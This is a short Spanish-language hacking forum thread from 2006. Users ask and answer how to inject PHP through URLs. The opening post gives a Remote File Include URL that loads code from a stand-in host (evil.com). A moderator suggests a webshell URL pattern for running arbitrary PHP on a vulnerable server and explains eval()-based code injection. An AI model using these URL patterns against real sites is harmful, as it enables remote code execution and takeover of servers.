elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 20:56  


Tema destacado: ¡Aprende hacking con práctica! - WarZone, el wargame de elhacker.net

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  PHP en URL para Remote File Include		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: PHP en URL para Remote File Include  (Leído 2,220 veces)
rewtwertw

Desconectado Desconectado

Mensajes: 15


Ver Perfil
PHP en URL para Remote File Include
« en: 1 Octubre 2006, 00:40 »
Pues eso, el asunto lo dice todo. Me gustaría saber como puedo añadir código php directamente en la url. Lo leí hace mucho tiempo, y ahora no lo encuentro por ningún lado :S

El Remote File Include suele ser del tipo:

http://host.com/vuln.php?variable=http://evil.com/code.txt

Pues yo quiero hacer algo como:

http://host.com/vuln.php[AQUÍ_VA_ALGO]<?php CODIGO ?>

Grácias por adelantado.
En línea
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.947


Lavando Platos


Ver Perfil WWW
Re: PHP en URL para Remote File Include
« Respuesta #1 en: 1 Octubre 2006, 02:40 »
el de insertar codigo PHP directamente en una variable, es con bugs de RCI (Remote Command Inclusion), que se generan con el mal uso de la funcion eval().. esta es una vulnerabilidad completamente distinta, pero puedes generar tu propia webshell que al hacer:

http://host.com/vuln.php?variable=http://tuserver.com/x.php?c=CODIGO_PHP

ejecute el codigo PHP que le mandes.

Saludos!!
En línea


Leer reglas
- WarZone.elhacker.net
- IRC de elhacker.net
- twitter de elhacker.net
- wiki de elhacker.net
rewtwertw

Desconectado Desconectado

Mensajes: 15


Ver Perfil
Re: PHP en URL para Remote File Include
« Respuesta #2 en: 1 Octubre 2006, 23:43 »
Ahm, sí, será eso :)

RCI... ni se me había pasado por la cabeza. Yo sabía que algo había leido sobre como meter php en la url.

Grácias :)
En línea
xDie


Desconectado Desconectado

Mensajes: 308



Ver Perfil
Re: PHP en URL para Remote File Include
« Respuesta #3 en: 3 Octubre 2006, 22:48 »
Cita de: Sdc en  1 Octubre 2006, 02:40
el de insertar codigo PHP directamente en una variable, es con bugs de RCI (Remote Command Inclusion), que se generan con el mal uso de la funcion eval().. esta es una vulnerabilidad completamente distinta, pero puedes generar tu propia webshell que al hacer:

http://host.com/vuln.php?variable=http://tuserver.com/x.php?c=CODIGO_PHP

ejecute el codigo PHP que le mandes.

Saludos!!
che sdc donde puedo leer sobre RCI? GRACIAS
En línea
Licence to kill!
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.947


Lavando Platos


Ver Perfil WWW
Re: PHP en URL para Remote File Include
« Respuesta #4 en: 3 Octubre 2006, 23:38 »
no tienes que leer mucho, el principio de la vulnerabilidad es muy sencillo.

en PHP, al usar eval("---codigo---".$variable."---codigo----");

si tenemos control sobre $variable podemos ejecutar codigo PHP..

asi de sencillo.

Saludos!!
En línea


Leer reglas
- WarZone.elhacker.net
- IRC de elhacker.net
- twitter de elhacker.net
- wiki de elhacker.net
xDie


Desconectado Desconectado

Mensajes: 308



Ver Perfil
Re: PHP en URL para Remote File Include
« Respuesta #5 en: 4 Octubre 2006, 15:35 »
A muchas gracias Sdc  ;)
En línea
Licence to kill!
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines